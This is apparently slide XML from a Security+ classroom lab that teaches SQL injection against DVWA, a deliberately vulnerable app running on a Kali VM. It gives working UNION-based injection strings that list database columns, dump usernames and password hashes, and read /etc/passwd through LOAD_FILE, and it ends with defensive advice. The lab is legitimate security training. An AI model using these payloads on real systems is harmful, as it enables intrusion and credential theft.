          <a:p>
            <a:pPr marL="685165" lvl="1" indent="-227965">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="227965" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US" sz="2025"/>
              <a:t>You should see the tables with the headers that begin with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685165" lvl="1" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US" sz="1725"/>
              <a:t>What do you think we can find in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1725" b="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1725"/>
              <a:t> table?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="227965" indent="-227965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23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078B-7A49-4CA8-9411-6B8AE314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E5107-16CF-4763-A0AB-5B6B90C7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8515350" cy="1279664"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Display all of the columns in the ‘users’ table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>1' and 1=1 UNION SELECT null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>(table_name,0x0a,column_name) FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> = 'users' 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EB01D2-7ECB-45EB-87E4-C77967606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184663"/>
            <a:ext cx="2104517" cy="2241357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FC9227-E0EA-4BEB-9B28-9426BE4E8A1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3286177" y="4130021"/>
            <a:ext cx="5431103" cy="1035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" tIns="19050" rIns="19050" bIns="19050" anchor="t">
            <a:normAutofit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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What do we think can be found from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> column?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" b="1">
              <a:latin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CF19A9-2ED9-4A70-833B-852D97F11ABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1181660" y="4622656"/>
            <a:ext cx="2043113" cy="27816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22088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E034-6995-4CE8-81C9-E1FEAAAF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BC5BD-E2E6-4121-AB8D-B83154140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38" y="1692136"/>
            <a:ext cx="8519562" cy="3723144"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>List all the passwords:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1' AND 1=1 UNION SELECT null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(password) FROM users #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Notice this displays all the passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>List all the passwords with the names:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1' AND 1=1 UNION SELECT null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, user, password) FROM users #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Add the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>0x0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> control character to format the data better:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1' AND 1=1 UNION SELECT null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, 0x0a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, 0x0a, user, 0x0a, password) FROM users #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>You should see all the user information - including the hashed passwords!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CDC55-431C-489D-8F35-5152B7BE8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027" y="217186"/>
            <a:ext cx="2716026" cy="779129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CCC945-4F1F-4D34-9958-2A5C12D3DF77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6902491" y="1599053"/>
            <a:ext cx="1973424" cy="3847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125" b="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What can be done with hashed passwords?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7346F7-7602-4FFD-AE7A-762F9AE1BA64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7322369" y="1085539"/>
            <a:ext cx="617826" cy="448625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62376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CE0C-64F6-476A-BAA3-6B928E1D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1D95D-18C7-4EF3-B91F-1AB77A007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78000"/>
            <a:ext cx="7886700" cy="43989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/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>What if you want to load a file from the server?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="227965" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>What about a sensitive file... like, say, user passwords?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="227965" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Try to load the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> file from the Kali Linux system:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685165" lvl="1" indent="-227965">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="CordiaUPC"/>
              </a:rPr>
              <a:t>1' OR 1=1 UNION SELECT null, LOAD_FILE('/etc/passwd')#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="227965" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Were you able to see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> file?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="227965" indent="-227965"/>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="227965" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>What else can be done with this capability?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330BFA-C9D2-4F93-B105-D306789D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822" y="3307027"/>
            <a:ext cx="3142084" cy="2156430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81646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68D7-A838-4E1A-96D5-90119D523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34376"/>
            <a:ext cx="8286750" cy="3956824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Limit information available in a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Why are hashed passwords stored on this database?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sanitize the inputs!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reject inputs that are not what the search was meant for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>NEVER trust user input – check it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Enumerate options for the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Numeric fields do not contain characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Email fields look like actual email addresses (what's that pattern look like?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What are some other ways of defending against an SQL Injection attack?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643FB7-1251-4D6B-98F8-C409F18FFC86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84137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4000" b="0"/>
              <a:t>How to Defend Against an SQL Injection Attack?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30911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Injection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7965" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Materials needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685165" lvl="1" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Kali Virtual Machine (With DVWA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685165" lvl="1" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Windows 7 Virtual Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="227965" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Software Tool used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685165" lvl="1" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DVWA (Damn Vulnerable Web Application)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1142365" lvl="2" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Follow the DVWA Setup Lab if not previously installed/available on your VM</a:t>
            </a:r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756-3C0E-4C4C-8F65-1B64191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7ACC-7C5D-4DE2-8122-25A92276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7965" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Security+ Objectives (SY0-601)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="685165" lvl="1" indent="-106680"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Objective 1.3 - Given a scenario, analyze potential indicators associated with application attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="1142365" lvl="2" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="1599565" lvl="3" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Structured query language (SQL)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="582930" lvl="1" indent="-10668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6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B2D6-DDCF-4D4B-B61A-2ED3C126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1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What is an SQL Injection Attack?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D8FE-5958-4695-9408-98B27A54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20990"/>
            <a:ext cx="8129270" cy="2784690"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A SQL Injection is an injection attack where attackers use SQL commands to bypass a website's security to gain access to data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The hackers could gain access to personal and private information from this database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600"/>
          </a:p>
          <a:p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39211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SQL Injection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45744"/>
            <a:ext cx="6666230" cy="2626255"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Setup environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Access DVWA website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lower DVWA security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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Setup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692136"/>
            <a:ext cx="7886700" cy="36675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/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Log into your range</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="227965" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Open the Kali Linux and Windows 7 Environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685165" lvl="1" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You should be on your Kali Linux Desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685165" lvl="1" indent="-227965"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You should also be on your Windows 7 Desktop</a:t>
            </a:r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426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CBF26C-1F6B-E3B3-992C-E91B41DC2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105" y="3336218"/>
            <a:ext cx="3219614" cy="825542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D1CB140-95D1-404C-814F-B73E6B019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86278"/>
            <a:ext cx="8180071" cy="37626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You will need the IP address of the Kali machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Open the Terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>In the Linux VM, open the Terminal and type the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685165" lvl="1" indent="-227965">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hostname -I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This will display the IP Address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Write down the Kali VM IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="32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BA7CDE-8F5A-4E7D-AA41-0BB9D18F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413750" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4130"/>
              <a:t>Find the IP Address (Kali Machine)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726B76-1341-4315-9C53-9DA51693D917}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276669" y="4508061"/>
            <a:ext cx="1742492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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The IP Address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109A9B-B236-46DA-B74B-C4E6918711FC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6655633" y="4056812"/>
            <a:ext cx="492282" cy="45124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7430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9979-6998-42B3-B29E-686B84C6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 into DVWA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2B0B-B1AD-4208-9429-4F79D3A07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3833494"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start up the web servers (on the Kali machine)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457172" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> /opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>lampp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>xampp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On the Windows Machine, go to the DVWA webpage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a: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Arial"/>
              </a:rPr>
              <a:t>&lt;Kali-IP-Address&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/dvwa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1650" b="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Login credentials are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>admin/password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1950" b="1" dirty="0">
              <a:latin typeface="Courier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F7956-0434-4CDA-8DE9-D1580C147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537" y="4298040"/>
            <a:ext cx="2114625" cy="1752240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92EB3D-DA1E-7DD5-7AFD-7C99F9788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005" y="495326"/>
            <a:ext cx="3914326" cy="1195364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="545BA7"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62120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8D41-C2A8-4E8A-B668-09BC353A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Lower DVWA’s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7FC43-A4B1-4E42-8E0C-A80703E5C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4475285" cy="3667538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2250"/>
              <a:t>Click on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1"/>
              <a:t>DVWA Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250"/>
              <a:t> button</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2250"/>
              <a:t>Change the security drop down option to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1"/>
              <a:t>Low</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2250"/>
              <a:t>Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1"/>
              <a:t>Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250"/>
              <a:t> button to set the website vulnerability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C9E6E-EB81-4E81-B119-681A43082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303" y="1898407"/>
            <a:ext cx="3379097" cy="2190016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C6BB78-433C-4764-8EEC-1A3905B5DD06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3899388" y="3680619"/>
            <a:ext cx="1345223" cy="4078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DVWA Security button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8253AD-BD80-4839-9AD8-4D46AEE7F48F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4826977" y="3343275"/>
            <a:ext cx="1015512" cy="350031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73EA408-4203-4C44-A10B-05E72778CEC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7165365" y="1580567"/>
            <a:ext cx="1345223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/>
            <a:r>
              <a:rPr lang="en-US" sz="1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to Low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6B8C77-3407-46AB-AE17-987B06A1FF71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7225851" y="1839515"/>
            <a:ext cx="554202" cy="778395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67904667"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
